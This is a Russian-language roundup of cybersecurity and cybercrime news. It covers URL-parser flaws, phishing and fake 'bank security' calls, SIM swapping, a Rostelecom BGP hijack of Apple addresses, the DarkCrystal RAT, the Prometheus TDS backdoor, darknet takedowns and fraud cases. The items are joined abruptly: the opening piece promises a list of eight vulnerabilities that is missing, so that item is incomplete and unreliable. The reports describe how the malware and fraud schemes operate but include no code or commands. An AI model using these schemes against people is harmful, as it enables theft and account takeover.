Использование нескольких синтаксических анализаторов стало одной из двух основных причин, по которым были обнаружены восемь уязвимостей. Другая причина — проблемы, возникающие из-за несоответствий, когда библиотеки следуют разным спецификациям URL-адресов, что фактически создает лазейку для преступников.
Диссонанс варьируется от путаницы, связанной с URL-адресами, содержащими обратную косую черту («\»), нестандартное количество косых черт (например, https:///) или закодированные данные URL («%»), до URL-адресов с отсутствующими схемами URL. При успешном использовании такие уязвимости могут привести к удаленному выполнению кода или к отказу в обслуживании (DoS) и фишинговым атакам с открытым перенаправлением.
Ниже приводится список из восьми обнаруженных уязвимостей (в настоящее время все проблемы исправлены):
Пользовательница ОЛХ разместила объявление о продаже парфюмерии. Как это нередко бывает с продавцами на данной площадке, опасаясь мошенников и недобросовестных покупателей, она требовала у клиентов предоплату за свой товар.
Вскоре после этого, с ней связался «покупатель», который выразил заинтересованность товаром и прислал ссылку на «получение денег». Женщина, которая забыла о том, что нужно с осторожностью относиться к подозрительным ссылкам, которые пересылают через мессенджеры для оплаты, ввела данные карты для зачисления предоплаты на фишинговом сайте. Удивительно, но в этот момент мошенники не списали с нее никаких денег.
Однако, вскоре после этого, раздался телефонный звонок и мужчина, представившийся сотрудником службы безопасности Монобанка, сообщил, что на ее карточном счету замечена подозрительная активность. Испугавшись, женщина потеряла всякую бдительность и напрочь забыла про популярную у мошенников схему «служба безопасности».
По словам «сотрудника службы безопасности», в связи с подозрительной активностью, карта клиентки была заблокирована. Чтобы сохранить средства на счету и возможность пользоваться деньгами, неизвестный предложил перевыпустить карту и перевести на нее деньги с старой карты.
Поскольку сумма на счету женщины была немаленькой, она была готова на любые манипуляции с ее банковскими счетами, чтобы сохранить деньги. Следуя указаниям «сотрудника службы безопасности Монобанка», она в телефонном режиме выполнила перевод 94 тысяч гривен с «заблокированной» старой карты на продиктованный ей номер «новой карты».
Выполнив данную операцию, женщина стала ждать, когда в ее мобильном приложении появится перевыпущенная карта со старыми деньгами. Однако этого так и не произошло – манипулируя страхами жертвы, мошенники заставили ее отправить деньги на их счет в другом банке.
По факту данного преступления ведется следствие. Суд уже предоставил правоохранителям разрешение на доступ к данным Монобанка, которые позволят выяснить, куда были отправлены краденные деньги, и кто является владельцем счета.
Британское Национальное агентство по борьбе с преступностью сообщило, что в начале текущей недели правоохранительные органы Англии и Шотландии арестовали восемь человек, которые занимались подменой SIM-карт и похищали деньги у американских знаменитостей и богатых людей. Часто атаки группы затрагивали известных спортсменов, музыкантов и так далее.
Представители Европола добавляют, что эти аресты стали продолжением крупной операции, начавшейся на Мальте и Бельгии, где ранее были задержаны другие члены этой же преступной группы. Данное расследование началось еще в прошлом году, после масштабного взлома Twitter, и в нем принимали участие власти США, Великобритании, Канады, Мальты и Бельгии.
По данным властей, преступники действовали по классической схеме и обманом вынуждали сотрудников американских операторов сотовой связи присвоить их SIM- карте телефонный номер знаменитости. Имея доступ к номеру жертвы, мошенники сбрасывали пароли и обходили двухфакторную аутентификацию в различных учетных записях. Суммарно такая активность принесла группировке более 100 000 000 долларов США в криптовалюте.
«Это позволяло им похищать деньги, биткоины и личную информацию, включая контакты, синхронизированные с онлайн-аккаунтами, — говорят правоохранители. — Они также захватывали акккаунты в социальных сетях, чтобы публиковать контент и отправлять сообщения от имени жертв».
Click to expand...
Источник: xakep.ru/2021/02/11/celebrity-sim-swap/
«Ростелекомом»?
В течение чуть более 12 часов 26-27 июля сеть российского Ростелекома начала
объявлять маршруты для части сети Apple. В результате интернет-пользователи в
частях Интернета, пытающиеся подключиться к услугам Apple, могли быть
перенаправлены в сеть Ростелеком. Похоже, Apple Engineering удалось уменьшить
влияние, и в конце концов «Ростелеком» перестал рассылать ложные объявления о
маршрутах. Однако это событие продемонстрировало, как Apple может
дополнительно защитить свои сети с помощью авторизации маршрута происхождения
(ROA).
Около 21:25 UTC 26 июля 2022 года сеть AS12389 Ростелекома начала объявлять
17.70.96.0/19. Этот префикс является частью блока Apple
17.0.0.0/8
; обычно Apple объявляет только больший блок 17.0.0.0/9, а не более короткую
длину префикса.
Когда маршруты, объявляемые сетью, не покрываются действующей авторизацией
источника маршрута (ROA), единственная возможность во время перехвата маршрута
— объявить более конкретные маршруты. Это именно то, что Apple Engineering
сделала сегодня; узнав о взломе, он начал объявлять 17.70.96.0/21, чтобы
направить трафик на AS714.
Данные RIPE RIS, полученные с помощью инструмента pybgpkit
Непонятно, что делал AS12389, так как он объявлял тот же префикс одновременно
с AS prepend.
Данные RIPE RIS, полученные с помощью инструмента pybgpkit
В отсутствие каких-либо достоверных данных для фильтрации возможных попыток
захвата маршрут, объявленный AS12389, был распространен по всему миру.
Инцидент был обнаружен BGPstream.com (Cisco Works) и GRIP Internet Intel (GA
Tech).
ССЫЛКА
ССЫЛКА
Apple, должно быть, тоже получила предупреждение. Какие бы методы смягчения
они ни применяли, они не остановили объявление Ростелекома, и поэтому Apple
объявила более конкретный маршрут. В соответствии с процессом выбора пути BGP
в первую очередь предпочтение отдается наиболее длинному совпадающему
маршруту. Длина префикса заменяет все другие атрибуты маршрута. Apple начала
анонсировать 17.70.96.0/21 для направления трафика на AS714.
Первое объявление для 17.70.96.0/21 появилось около 02:41 UTC 27 июля — через
5 часов 16 минут после первого появления 17.70.96.0/19 от AS12389.
Тем временем AS12389 продолжал объявлять возможный захваченный маршрут в
течение многих часов. Наконец, около 09:39 UTC 27 июля мы начали наблюдать
отказы от маршрута 17.70.96.0/19, через 12 часов и 14 минут после его начала.
Неясно, какие службы пострадали от этого инцидента. Если мы не получим более
подробную информацию от Apple или других исследователей, мы можем только
догадываться.
Для сетевых операторов чрезвычайно важно внедрить эффективную фильтрацию маршрутов на основе поддающейся проверке информации о том, какие сети на законных основаниях уполномочены создавать какие номерные ресурсы (номера AS и префиксы IP).
Это то, для чего был разработан RPKI, важно иметь действительный объект
Route/Route6, но в наши дни, когда многие крупные сетевые операторы выполняют
проверку происхождения маршрута (ROV) и отбрасывают все маршруты с
недействительными источниками, еще более важно иметь объект Route/Route6.
действующая авторизация объекта маршрута (ROA) для всех ваших ресурсов.
К сожалению, AS12389 (Ростелеком) уже был частью нескольких инцидентов в
прошлом, которые мы подробно освещали в предыдущих сообщениях
блога .
Это может повториться в любой момент. Сетевые операторы несут ответственность
за обеспечение глобальной надежной и безопасной инфраструктуры маршрутизации.
Безопасность вашей сети зависит от инфраструктуры маршрутизации, которая
останавливает злоумышленников и смягчает случайные неправильные настройки,
которые наносят ущерб Интернету. Чем больше сетевых операторов будут работать
вместе, тем меньше будет инцидентов и тем меньший ущерб они могут нанести.
Источник: [https://www.manrs.org/2022/07/for-1...rings-network-hijacked-by- russias-rostelecom/](https://www.manrs.org/2022/07/for-12-hours-was-part-of- apple-engineerings-network-hijacked-by-russias-rostelecom/)
Исследователи из компании BlackBerry провели анализ малвари DarkCrystal RAT (он же DCRat) и активности ее разработчика в даркнете. Судя по всему, вредонос активен с 2019 года, является «детищем» одного русскоязычного разработчика и продается всего за 500 рублей (примерно 7 долларов США) на два месяца или 4200 рублей (около 60 долларов США) за пожизненную лицензию.
В отчете компании отмечается, что столь низкая цена, это довольно необычное явление, из-за чего создается впечатление, что автор малвари, известный под никами boldenis44, crystalcoder и просто Кодер, вообще не ищет прибыли, имеет альтернативный источник финансирования, или, вероятно, DarkCrystal — его личный проект, а не основной источник дохода.
DarkCrystal написан на .NET и имеет модульную конструкцию, в чего может использоваться для разных задач, включая динамическое выполнение кода, кражу данных, слежку и организацию DDoS-атак. Интересно, что функциональность можно расширить с помощью сторонних плагинов, разработанных аффилированными лицами с использованием специальной IDE DCRat Studio, а подписчикам предоставляется доступ к списку поддерживаемых плагинов.
После запуска на компьютере жертвы малварь собирает системную информацию и передает на управляющий сервер такие данные, как имена хостов и пользователей, данные о местоположении, привилегиях, установленных защитных решениях, данные о материнской плате и BIOS, а также версии Windows.
DarkCrystal способен делать скриншоты, перехватывать нажатия клавиш и воровать различные типы данных из системы, включая содержимое буфера обмена, файлы cookie, пароли, историю браузера, данные банковских карт, а также учетные записи Telegram, Discord, Steam, FileZilla.
В сам «продукт» включены три компонента: исполняемый файл для стилера/клиента, интерфейс C&C и исполняемый файл, написанный на JPHP, который представляет собой инструмент для администратора. Последний спроектирован таким образом, чтобы хакер имел возможность незаметно активировать «рубильник», то есть злоумышленник может удаленно сделать инструмент непригодным для использования. Также он позволяет подписчикам общаться с управляющим сервером, отдавать команды зараженным эндпоинтам и отправлять автору малвари отчеты об ошибках.
В настоящее время DarkCrystal RAT размещается на crystalfiles[.]ru, куда «переехал» с dcrat[.]ru — простого сайта, который использовался только для скачивания. Так как предыдущий анализ малвари, проведенный экспертами Mandiant в мае 2020 года, проследил инфраструктуру RAT до files.dcrat[.]ru, переход на crystalfiles[.]ru, по мнению специалистов BlackBerry, указывает на то, что автор малвари реагирует на публичное раскрытие информации.
Операции по продаже и рекламе малвари теперь осуществляются через русскоязычные хак-форумы (в том числе lolz), а новости и обновления публикуются в Telegram.
Также отсчет гласит, что в процессе распространения и развертывания DarkCrystal участвуют маяки Cobalt Strike и TDS под названием Prometheus, детально описанная специалистами Group-IB в прошлом году.
• Source: [https://blogs.blackberry.com/en/202...rt-cheap-russian-rat-offers- backdoor-bargains](https://blogs.blackberry.com/en/2022/05/dirty-deeds-done- dirt-cheap-russian-rat-offers-backdoor-bargains)
Пиринговая сеть Lantern позволит обмениваться контентом даже при полном отключении России от мирового интернета.
Пока Россия готовилась к отключению Рунета от глобального интернета и получению полного контроля над информационным потоком, американская компания Lantern также вела подготовку, но совсем другого рода – строила на территории РФ устойчивую сеть, которую российское правительство не смогло бы отключить.
Последние четыре недели среди российских пользователей стремительно набирает популярность приложение Lantern, позволяющие обходить блокировку Facebook, Twitter и Instagram. Теперь же компания строит нечто более устойчивое – внутреннюю пиринговую сеть, позволяющую российским пользователям загружать и обмениваться контентом даже в случае полного отключения интернета правительством.
«Мы собираем сеть по кусочкам в России в течение уже двух лет. Так что, на территории России сейчас Lantern – это еще и пиринговая сеть со всем оппозиционным контентом, распространяемым внутренне», – сообщил VICE News один из разработчиков компании, пожелавший сохранить анонимность.
В ближайшие несколько недель сеть будет полностью готова, и оппозиционеры смогут использовать приложение Lantern для публикации контента (видео с протестов, событий в Украине и пр.) непосредственно в сеть Lantern, не беспокоясь о том, что он будет удален или заблокирован.
За последние четыре недели трафик, проходящий через серверы Lantern, увеличился на 100000%. Компания не сообщила число пользователей своего приложения в России, но отметила, что по всему миро оно было загружено 150 млн раз и в настоящее время насчитывает 7 млн активных пользователей в месяц – в два раза больше, чем три года назад.
На этой неделе трафик российских пользователей превзошел по объему трафик пользователей в Китае, которые в течение нескольких лет были главными клиентами Lantern.
В то время как другие VPN-компании сталкиваются с попытками блокировки их работы в России, Lantern работает не так, как традиционные VPN. Приложение позволяет получать доступ к заблокированным на региональном уровне сервисам наподобие Netflix и BBC iPlayer, а его технология обхода цензуры более устойчивая. За последние несколько недель компания не сталкивалась с какими- либо сбоями в работе своего сервиса в России, во много благодаря многолетнему опыту обхода цензуры в Китае.
Если Россия будет полностью отключена от мирового интернета, даже использование традиционных VPN не поможет, и здесь на помощь придет новая пиринговая сеть Lantern, которая позволит пользователям общаться и публиковать контент без цензуры.
Финская таможня в сотрудничестве с полицией Швеции закрыла сайт и конфисковала серверы маркетплейста Sipulitie. Даркнет-маркет Sipulitie, работающий в сети Tor, был запущен в феврале 2023 года. Сайт, доступный на финском и английском языках, служил площадкой для незаконной торговли наркотиками. По информации из открытых источников, доход платформы составлял около 1,3 миллиона евро.
В ходе расследования удалось установить личности тех, кто был причастен к преступной деятельности на Sipulitie. Также выяснилось, что площадка стала продолжением Sipulimarket — сайта, закрытого таможней в 2020 году. Sipulimarket был запущен в 2019 году и специализировался на торговле наркотиками и допингом. Оборот оценивался более чем в 2 миллиона евро. После закрытия сайта бывший администратор создал Sipulitie, а также ещё одну торговую платформу под названием Tsätti, которая также была закрыта в рамках данного расследования.
В результате финская таможня совместно с полицией установила личности администраторов, модераторов и лиц, поддерживающих работу сайтов, а также покупателей и продавцов. Расследование продолжается, при этом в нём участвуют финская полиция, полиция Швеции, Европол, спецслужбы Польши и ИБ-компания Bitdefender.
tulli.fi/-/suomen-tulli-sulki-salatussa-tor-verkossa-toimineen-sipulitie-
kauppapaikan
bitdefender.com/en-us/blog/hotforsecurity/finnish-customs-europol-swedish-
police-and-bitdefender-cooperation-leads-to-sipulitie-dark-web-marketplace-
shut-down/
Правоохранительные структуры королевства закрыли преступную банду, занимавшуюся мошенничеством через интернет. Так, в ходе полицейской операции под названием «Калинка-Тиран» в столице Румынии удалось арестовать главаря группировки, в отношении которой было направлено свыше 300 жалоб и выписано 33 ордера на арест.
Отмечается, что расследование по этому делу тянулось с августа 2021 года. Испанская полиция провела анализ сотен банковских счетов, где были выявлены транзакции на 10 миллионов евро. Румынский лидер группировки, который считается одним из наиболее активных киберпреступников в Европе, уже экстрадирован в Испанию.
Испанские следователи заявили, что преступники похитили персональные данные 55 человек для открытия банковских счетов. Киберпреступники применяли различные методы обмана, среди которых взлом аккаунтов в мессенджере WhatsApp и рассылка сообщений с просьбой одолжить денежные средства, а также многочисленные аферы с арендой жилья, сбор предоплаты и немедленное исчезновение.
Преступники использовали промышленный принтер для печати фальшивых документов, которые затем задействовали для открытия банковских счетов. Полученные средства легализовывались через покупку криптовалюты.
Кроме того, на счету преступников оформление микрокредитов и открытие банковских счетов по чужим документам, фишинг и смишинг для получения банковских реквизитов и конфиденциальных данных жертв и сообщения формата «сын в беде» с просьбами оперативно направить деньги.
• Source: [https://www.interior.gob.es/opencms...-los-ciberdelincuentes-mas- activos-en- Espana/](https://www.interior.gob.es/opencms/ca/detalle/articulo/Detenido-en- Rumania-uno-de-los-ciberdelincuentes-mas-activos-en-Espana/)
Гражданин Индии Чираг Томар, которого арестовали в конце 2023 года в США, признался в создании поддельного сайта Coinbase с целью кражи активов пользователей. Он сумел украсть $9,5 млн.
30-летний индиец с компанией своих сообщников в 2021 году создали поддельный сайт американской криптовалютной биржи Coinbase. В период с июня 2021 года по конец 2023 года сайтом воспользовалось не менее 542 человек, которые пытались завести на биржу свыше $9,5 млн, однако средства пошли в карман злоумышленников.
Американским правоохранительным органам удалось идентифицировать Чирага Томара (Chirag Tomar) благодаря тому, что он пользовался электронной почтой со своим реальным именем для общения со своими сообщниками. Этот же адрес почты Томар использовал и для получения туристической визы в США для встречи со своими родственниками.
Томар хранил таблицу со списком жертв и украденными суммами, а также использовал полученные с помощью фиктивного сайта документы пользователей для создания аккаунтов на Binance и других криптовалютных биржах.
Правоохранительные органы отмечают, что
Томар использовал незаконно полученные средства для шикарного образа жизни,
покупки дорогих часов и автомобилей марок Porsche и Lamborghini. Также он
путешествовал в Лондон, Дубай и Таиланд.
Чирагу Томару предъявлены объявления в сговоре с целью электронного мошенничества и в сговоре с целью отмывания денег. По каждому обвинению ему грозит до 20 лет лишения свободы.
Ранее сообщалось, что суд тайского острова Пхукет приговорил пятерых граждан РФ к двум годам тюремного заключения за кражу криптовалюты у супружеской пары из России.
Главным следственным управлением Следственного комитета совместно с управлением по противодействию киберпреступности УВД Могилевского облисполкома пресечена деятельность распространителя вредоносов в Кобрине.
По данным следствия 27 - летний местный житель занимался изменением и реализацией вредоносного программного обеспечения, которое в дальнейшем могло использоваться для несанкционированного доступа к операционным системам, блокирования и модификации компьютерной информации. Свою деятельность мужчина осуществлял посредством мессенджера Telegram, где поддерживал контакт с заказчиками и подыскивал потенциальных клиентов.
Следователями проведен обыск по месту жительства, изъята компьютерная техника и носители информации. Устанавливается причастность задержанного к совершению ряда иных преступлений.
В настоящее время ему предъявлено обвинение по ч.1 ст.354 (использование, распространение либо сбыт вредоносных компьютерных программ) Уголовного кодекса Республики Беларусь и применена мера пресечения в виде заключения под стражу. Окончательная правовая оценка будет дана по результатам расследования.
source: sk.gov.by/ru/news-ru/view/sledovateljami-presechena-dejatelnost- vredonoschika-iz-kobrina-12682
Комиссии за такую услугу составляют от 35% до 85% от выводимой суммы
В даркнете стали появляться предложения по высвобождению активов с
заблокированных аккаунтов россиян на зарубежных криптобиржах. Об этом пишет
«Коммерсант».
Эксперты, опрошенные изданием, рассказали о появлении в даркнете предложений
по освобождению средств заблокированных аккаунтов на иностранных криптобиржах.
В объявлениях предлагается вывести средства с Binance, Kraken, Huobi, KuCoin.
Комиссия начинается от 35% от выводимой суммы и доходит до 85%.
Впрочем, среди таких предложений могут быть и мошеннические, число которых
растет, предупреждает юрист корпоративной практики Key Consulting Group
Ангелина Севостьянова.
Напомним, что Европейский союз в октябре ужесточил антироссийские санкции в
отношении криптовалют. Компаниям с европейской лицензией запретили открывать
счета и криптокошельки для россиян, хотя до этого действовало ограничение по
величине активов в 10 тысяч евро.
Для россиян доступ закрыли торговые площадки BitMEX, Bitstamp, WhiteBIT,
Gemin, а некоторые, — например Binance, Coinbase и Kraken — частично
ограничили операции пользователей из России.
Согласно оценке, приведенной главным аналитиком «РегБлока» Анной Авакимян, на
криптобиржах оказались заблокированы аккаунты у 10–20 тысяч россиян с активами
на 2–3 млрд рублей.
Гражданин Канады был приговорен к 57 месяцам тюремного заключения и штрафу в размере 813 тысяч долларов за продажу подарочных карт в даркнете. Суммарная стоимость предлагаемых им товаров перевалила за 22 миллиона долларов.
По данным Министерства юстиции США, расследование в отношении 41-летнего Ричарда Веррета (Richard Verret) из Квебека (Канада) началось в марте 2022 года. Спустя чуть больше, чем год его признали виновным по шести пунктам, в том числе в несанкционированном вымогательстве устройств доступа и торговле поддельными устройствами доступа.
В судебных документах говорится, что Веррет был арестован в аэропорту Орландо (штат Флорида) 7 апреля 2022 года. Вскоре после этого он признал себя виновным по предъявленным обвинениям, заявив, что действительно создал и администрировал в последние четыре года сразу несколько площадок, торгующих подарочными карточками. Платежи канадец принимал через PayPal. За указанный период времени через связанные с ним сайты прошли более 550 тысяч карт.
source: msn.com/en-us/news/us/online-gift-card-scheme-lands-canadian-man-in- federal-prison/ar-AA1d4AKA
Столичная полиция возбудила сразу несколько уголовных дел в отношении 29-летней сотрудницы «Райффайзенбанка», которая воровала деньги с карточек клиентов-иностранцев, использованная схема оказалась относительно бесхитростной, однако позволила девушке стать богаче на миллион рублей.
Алена С. Работала в филиале банка на Мичуринском проспекте. В какой-то момент ей в голову пришла идея, как делать клиентов компании чуть менее обеспеченными. Сначала она выпускала к счетам иностранцев дополнительные карты, после чего или снимала деньги с пластика, или оформляла от имени вкладчиков заявления на перевод. Сами клиенты никаких уведомлений не получали и о сомнительных операциях ничего не знали.
Чтобы не вызывать подозрений, девушка снимала совсем небольшие суммы, однако в какой-то момент у нее проснулся аппетит, из-за чего один из клиентов «Райффайзенбанка» потерял сразу 277 тысяч рублей. Другим потерпевшим повезло чуть больше: суммы их убытков колеблются в пределах от 40 тысяч до 100 тысяч рублей. Всего же добычей предприимчивой сотрудницы стало около миллиона рублей. Схему раскрыли после обращений клиентов в банк.
Специалисты Group-IB рассказали о Prometheus TDS (Traffic Direction System), сервисе, который предназначен для распространения вредоносных файлов и перенаправления пользователей на фишинговые и вредоносные сайты.
Еще весной 2021 года аналитики Group-IB обнаружили следы вредоносной кампании загрузчика Hancitor. Исследователей заинтересовал нетипичный паттерн его распространения, который впоследствии был описан командами исследователей Unit 42 и McAfee как новая техника, призванная уберечь документы с вредоносными ссылками и вложениями от внимания веб-сканеров. Однако данные, извлеченные аналитиками Group-IB, указывают на то, что аналогичная схема также используется для распространения таких вредоносных программ, как Campo Loader, IcedID, QBot, SocGholish и Buer Loader.
Эксперты выявили по меньшей мере 3000 пользователей, ставших целями разрозненных вредоносных кампаний с использованием идентичной схемы. Наиболее активные были нацелены на физических лиц в Бельгии, а также на компании, корпорации, университеты и правительственные организации в США.
Анализируя кампании по распространению различного вредоносного ПО, эксперты пришли к выводу, что они могли проводиться с использованием одного и того же MaaS-решения (Malware-as-a-Service). Это предположение подтвердилось после того, как на одной из андеграундных площадок было найдено предложение о продаже услуг сервиса Prometheus TDS.
Суть Prometheus TDS состоит в том, что сервис представляет административную панель, в которой злоумышленник настраивает необходимые параметры для кампании: загружает вредоносные файлы, настраивает ограничения по геолокации пользователей, версии браузера и операционной системы.
Чтобы потенциальные жертвы вредоносных кампаний не взаимодействовали с административной панелью напрямую (что чревато раскрытием и блокировкой сервера злоумышленника), Prometheus TDS использует сторонние зараженные сайты, которые выступают в качестве промежуточного звена. Список скомпрометированных сайтов добавляется операторами вредоносных кампаний вручную, путем импорта списка веб-шеллов.
На скомпрометированные сайты загружается специальный PHP-файл, названный Prometheus.Backdoor, который собирает и отправляет в административную панель данные о посетителе. После анализа собранных данных административная панель принимает решение о том, отдать пользователю вредоносную нагрузку или перенаправить его на заданный URL-адрес.
Когда все настроено, клиенты могут переходить к рассылке спамерских сообщений, в тексте которых содержатся ссылки на взломанные сайты. Когда пользователи переходят по таким ссылкам, они попадают на взломанный сайт, где бэкдор Prometheus анализирует данные браузера жертвы, а затем либо перенаправляет пользователя на чистую веб-страницу, либо на страницу, где размещен вредоносный файл (в зависимости от настроек конкретной вредоносной кампании).
По данным исследователей, Prometheus рекламируется на подпольных форумах с августа 2020 года, и цена его услуг составляет от 30 долларов за два дня до 250 долларов в месяц. Как уже отмечалось выше, услугами сервиса пользуются многие авторы малвари, включая Campo Loader, IcedID, QBot, SocGholish и Buer Loader.
Подробности этого исследования представлены в блоге:
Ключ к успеху для Campo Loader, Hancitor, IcedID и QBot
blog.group-ib.ru
В России в мае 2022 г. может появиться отечественный агрегатор программ вознаграждения «белых» хакеров за поиск уязвимостей – bug bounty. Над ним работает ИБ-компания Positive Technologies. Это будет российский аналог популярной международной платформы HackerOne.
Россияне заплатят хакерам
Компания Positive Technologies, работающая в сфере информационной безопасности, намерена запустить в России отечественную платформу по поиску уязвимостей в информационных системах. Об этом пишет «Коммерсант» со ссылкой на представителя компании.
Другими словами, Positive Technologies готовит отечественный вариант известной международной платформы-агрератора программ вознаграждения за поиск уязвимостей (bug bounty) HackerOne. Суть платформы, по большому счету, заключается в том, чтобы отвлечь хакеров от взлома систем в корыстных целях.
Участвуя в подобных программах, «этичные» хакеры («белые хакеры», символ этого движения – белая шляпа, white hat) не только проверяют и оттачивают свое мастерство, но и имеют шанс заработать на этом. Успешные взлом и поиск уязвимостей приносят им вознаграждение от организаторов программ.
Свой аналог HackerOne компания Positive Technologies намерена запустить в мае 2022 г., ровно через полгода. Это будет именно полноценный агрегатор частных программ вознаграждения хакеров за взлом.
Со слов руководителя отдела анализа защищенности приложений Positive Technologies Ярослава Бабина, будущая платформа, название которой не раскрывается, «станет посредником между “этичными хакерами” и компаниями». «Сейчас в России такой системы нет, отдельные bug bounty от российских компаний размещаются на международной HackerOne», – заявил он изданию.
Импортозамещение и модернизация идей
Директор центра компетенции Positive Technologies Андрей Бершадский подчеркнул, что грядущая платформа-агрегатор программ bug bounty будет иметь свои характерные отличия от конкурирующих продуктов. В частности, в ней будет реализовано два формата программ bug bounty.
Первый формат Бершадский назвал «традиционным». Его реализация будет хорошо знакома тем, кто участвует в bug bounty. «В традиционной программе bug bounty заказчик платит в целом за обнаруженные уязвимости и получает огромный поток, приходится тратить много ресурсов на верификацию».
Новый формат программ подразумевает формирование некоего реестра «недопустимых событий». Здесь Бершадский предлагает выплачивать хакерам вознаграждение за «цепочку атак, которая однозначно приведет к неприемлемому ущербу». Выбрав такой формат, заказчик, со слов Бершадского, «сэкономит на верификации, а хакеру демонстрация неприемлемого ущерба может принести больший доход».
Идея востребована
Инициатива Positive Technologies по созданию импортозамещенной версии HackerOne специально для России была воспринята положительно. Мнение «за» высказал, в частности, банк ВТБ.
Представители банка, как пишет «Коммерсант», убеждены в целесообразности создания платформы для «этичных» или «белых» хакеров. По их словам, новая платформа может принести пользу, в том числе, и за счет «публикации информации о типовых недопустимых событиях для бизнес-систем различного класса, полагают в пресс-службе банка. «Это позволит компаниям повысить релевантность собственных моделей угроз», – добавили они.
За создание отечественного агрегатора программ bug bounty высказался и ведущий системный инженер компании Varonis Systemes Александр Ветколь. Он сообщил «Коммерсанту», что появление такой платформы в стране даст возможность «снять массу бюрократических вопросов в организации такого процесса внутри компаний, и, при грамотной реализации сервиса, он избавит “золотоискателей” (хакеров, участвующих в программе – прим. CNews) от рисков потенциальных невыплат».
Мнение против
В негативном ключе на возможность появления в России аналога HackerOne отреагировала менеджер по развитию бизнеса группы Angara Анна Михайлова. Она полагает, что «подобная схема может использоваться компаниями как очередной критерий для отказа в вознаграждении.
«Оценка рисков и тем более ущерба – не настолько прозрачный процесс, особенно когда его нужно увязывать с уязвимостями», – заявила изданию Анна Михайлова.
Заимствование идей
Positive Technologies – не первая компания, желающая создать в России отечественного конкурента HackerOne. По информации «Коммерсанта», такая идея родилась у российского банковского сообщества во главе с Центробанком.
С этой задумкой банки направились в «Ростелком-солар» - дочернюю компанию «Ростелекома», работающую, как и Positive Technologies, в сегменте информационной безопасности.
Пока дальше планов эта идея не зашла. Однако в активе «Ростелеком-солар» есть программа по поиску уязвимостей в ПО и «железе», созданная в рамках федпроекта «Информационная безопасность» из состава нацпрограммы «Цифровая экономика». Запуск программы состоялся в июне 2021 г.
Кто платит хакерам
Свои программы финансового поощрения хакеров за поиск уязвимостей в продуктах, объединенные под общим названием bug bounty, есть у многих крупных компаний. Регулярными поощрениями хакеров занимаются корпорации Microsoft, Apple и Google.
Например, только за счет Microsoft в период 1 июля 2020 г. по 30 июня 2021 г. «белые» хакеры обогатились на $13,6 млн. Эту сумму корпорация выплатила им за участие в 17 программ по поиску уязвимостей в своих программных продуктах и сервисах. Эти деньги поделили между собой 340 ИБ-специалистов из 58 стран мира.
Интернет-гигант Google тоже платит хакерам, даже тем, кто ищет бреши в чужих программных продуктах. CNews писал, что еще в августе 2019 г. Google включила в свою баунти-программу все приложения из магазина Play Store, у которых более 100 млн загрузок. Под действие новых правил подпадают WhatsApp, Facebook, Instagram и другие популярные приложения.
Однако сотрудничество с хакерами далеко не всегда идет на пользу корпорациям. В конце ноября 2021 г. CNews освещал ситуацию, в которой оказалась Microsoft. Обидевшийся на нее «белый» хакер опубликовал секрет превращения любого пользователя Windows в администратора. По его мнению, корпорация существенно недоплатила ему в рамках программы поиска ошибок в продуктах экосистемы Windows. С ним солидарны многие его «коллеги».
• Source: https://safe.cnews.ru/news/top/2021-11-26_v_rossii_poyavitsya_importozameshchennuyu
Известный российский журналист-расследователь, работающий на Русскую службу Би-би-си, заявил в понедельник, что он покинул страну через два месяца после того, как его окрестили «иностранным агентом».
В видеоролике, опубликованном BBC Russia, Андрей Захаров сказал, что он переехал в Великобританию после того, как столкнулся с «беспрецедентной слежкой» после того, как в октябре был назначен «иностранным агентом».
Захаров - рассматривается как один из самых авторитетных журналистов - расследователей в стране - сломал историю на президента Владимира Путина якобы экс-любовницы и их предполагаемыми внебрачной дочери в конце прошлого года. Он также сообщил о вмешательстве России в президентские выборы в США в 2016 году и совсем недавно расследовал деятельность базирующегося в России хакерского коллектива Evil Corp.
В видео, опубликованном в понедельник, Захаров сказал, что не знает точной причины, по которой за ним следят, но связал наблюдение со своим репортажем.
«Пока не ясно, с чем была связана слежка: с тем, что меня признали« иностранным агентом », или, возможно, с работой, которую я проделал о хакерах из группы Evil Corp, над которой я работал вместе со своим британским агентом. коллеги », - сказал Захаров.
Захаров - последний из череды журналистов и правозащитников, которые покинули
страну в последние месяцы после того, как на них навесили ярлык «иностранный
агент».
В настоящее время Минюст России внес в список «иностранных агентов» более 100
юридических и физических лиц, большинство из которых были внесены в реестр в
2021 году.
Отмеченные физические и юридические лица должны представлять регулярные финансовые отчеты и подробные списки доходов и расходов, а также размещать на видном месте многословные заявления об отказе от ответственности во всех статьях, сообщениях в социальных сетях и других публикациях, иначе им будут предъявлены уголовные обвинения.
В видеоролике Захаров добавил, что, хотя он сожалеет о том, чтобы покинуть Россию, он продолжит соблюдать правила для «иностранных агентов». BBC сообщила в своем более раннем заявлении, что они отвергают решение российских властей объявить своего журналиста «иностранным агентом».
На прошлой неделе Путин заявил, что российские законы об "иностранных агентах" более либеральны, чем их западные аналоги, но правозащитные группы раскритиковали "репрессивный" закон и считают, что он был введен для наказания критиков Кремля и подавления инакомыслия.
В Петербурге задержали группу кибермошенников, которые взламывали мобильные банки через архивные номера, купленные в даркнете. Подробности рассказали в пресс-службе ГУ МВД по городу и Ленобласти.
Житель Челябинской области обратился в полицию Центрального района 14 октября и сообщил, что его личный кабинет мобильного банка взломали, а затем на имя мужчины якобы оформили кредит на 100 тысяч рублей. Уголовное дело было возбуждено по части 2 статьи 159 УК РФ (мошенничество). По ней грозит до пяти лет лишения свободы.
«Расследуя преступление, сотрудники уголовного розыска вышли на группу молодых кибермошенников», — отметили в ведомстве.
По предварительным данным, злоумышленники, используя «бэушный» номер, взламывали личный кабинет жертвы и, либо похищали хранившиеся там деньги, либо оформляли онлайн кредит и похищали заемные средства.
Каждый из участников группы регулярно менял сим-карты в своем мобильном, пытаясь тем самым замести следы. Предполагаемых мошенников уже задержали. Ими оказались двое уроженцев Иркутской области, 19 и 20 лет, а также их 19-летняя знакомая из Ивановской области.
По месту их проживания, в доме №20/3 по улице Белы Куна, полицейские уже провели обыск. Они изъяли три мобильных телефона и ноутбук.
«Проводятся оперативно-следственные действия по установлению соучастников преступлений и причастности задержанных к дополнительным эпизодам преступной деятельности», — подытожили в сообщении.
Основатель Cardano заявил, что созданный его командой криптовалютный кошелек Lace Paper Wallet является самым безопасным инструментом для хранения цифровых активов в истории криптоиндустрии и предложил крупное вознаграждение тому, кто сможет доказать обратное.
Чарльз Хоскинсон (Charles Hoskinson) сообщил, что конкурс взломщиков кошелька Cardano открыт до конца 2024 года — или до тех пор, пока кто-либо успешно не выполнит задание, взломав Lace Paper Wallet.
